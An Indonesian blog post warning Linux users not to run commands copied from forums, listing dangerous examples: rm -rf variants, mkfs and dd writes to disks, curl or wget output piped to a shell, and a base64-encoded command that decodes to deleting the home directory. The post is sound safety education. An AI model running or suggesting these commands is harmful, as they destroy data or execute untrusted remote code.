Jangan Sembarang Menjalankan Baris Perintah di Linux
Komputer yang bertenaga dan sistem operasi berkeamanan ketat, akan tiada berarti jika si penggunanya adalah pribadi yang ceroboh. Manusia adalah makhluk sosial, yang mudah terpengaruh suasana hati dan lingkungan. Kerentanan inilah yang dimanfaatkan malware (malicious software) dengan teknik social engineering-nya.
Kali ini kita tidak akan membahas malware, namun temanya masih berkaitan. Menyambung artikel Jangan Copy Paste dari Website ke Terminal!, artikel kali ini masih bertema ajakan agar tidak ceroboh menjalankan sembarang perintah yang didapat dari dunia maya.
Ada banyak alasan kita bersukarela menjalankan perintah yang kita lihat dari forum atau situs web di komputer kita, misalnya saja karena telah letih troubleshooting kerusakan atau kita percaya kepada si pemberi command line. Dengan kata lain, celah kerusakan ini tidak selalu karena si pengguna tidak mengerti dengan apa yang diketiknya, namun lebih cenderung sedang dalam kelengahan.
Berikut beberapa contoh perintah yang patut diwaspadai dan jangan sembarang dijalankan:
Perintah yang menggunakan regular expression
Regular expression is black magic. Jika tidak bisa memahami kerja perintah yang memakai regex, lebih baik jangan dijalankan.rm -rf / rm -rf . rm -rf * rm -r .[^.]*
Perintah yang berhubungan dengan sarana penyimpanan
Baca berkali-kali jika Anda diminta menjalankan perintah yang berhubungan dengan partisi atau media penyimpanan lainnya.mkfs mkfs.ext3 mkfs.apapun_yang_umumnya_nama_filesystem sembarang_perintah > /dev/sda dd if=something of=/dev/sda_atau_nama_disk_lainnya
Perintah yang menjalankan skrip
Belum lama ini saya perlu memasang paketnodejs
teranyar di Debian. Dengan alasan laju pengembangannodejs
yang sangat pesat, versi paket dalam repo Debian cenderung lambat diperbaharui, memaksa saya untuk mencari sumber lain.Akhirnya saya menuju situs nodejs.org. Namun sungguh tak dinyana, proyek sebesar
nodejs
ternyata menyediakan cara pemasangan yang patut dipertanyakan, seperti berikut:curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash - sudo apt-get install -y nodejs
Beruntung,
nodejs
juga menyediakan repo tersendiri sehingga saya bisa memasangnya dengan cara yang lebih terjamin keamanannya.Intisarinya, teliti siapa dibalik pemberi perintah dengan pola berikut:
wget http://alamat_situs/skrip_berpotensi_membahayakan sh ./skrip_berpotensi_membahayakan
atau
wget http://alamat_situs/skrip_berpotensi_membahayakan -O- | sh
Perintah yang mengandung string yang telah dirubah bentuk (encoded)
Anda bertanya di suatu forum untuk meminta saran agar sistem Linux Anda lebih gegas. Dan seseorang kemudian mengirim dan menyarankan untuk menjalankan perintah berikut:$(echo cm0gLXJmIH4vKg== | base64 -d)
Apa yang akan Anda lakukan? Tidakkah rentetan huruf itu tampak aneh?
Seperti yang dicamkan di atas, jangan jalankan perintah yang tidak Anda mengerti!
Baris di atas sekilas tidak terlihat membahayakan, hanyaecho
. Namun SALAH BESAR! Perintah di atas sama denganrm -rf ~/*
yang tanpa ragu akan menghapus seluruh isi$HOME
. Saya lebih memilih kehilangan root daripada kehilangan isi$HOME
.
So, berhati-hatilah selalu. Trust nobody. Jangan malu untuk bertanya jika mendapati baris perintah yang tidak dimengerti. Jika tidak juga kunjung paham, jangan jalankan.
Permios…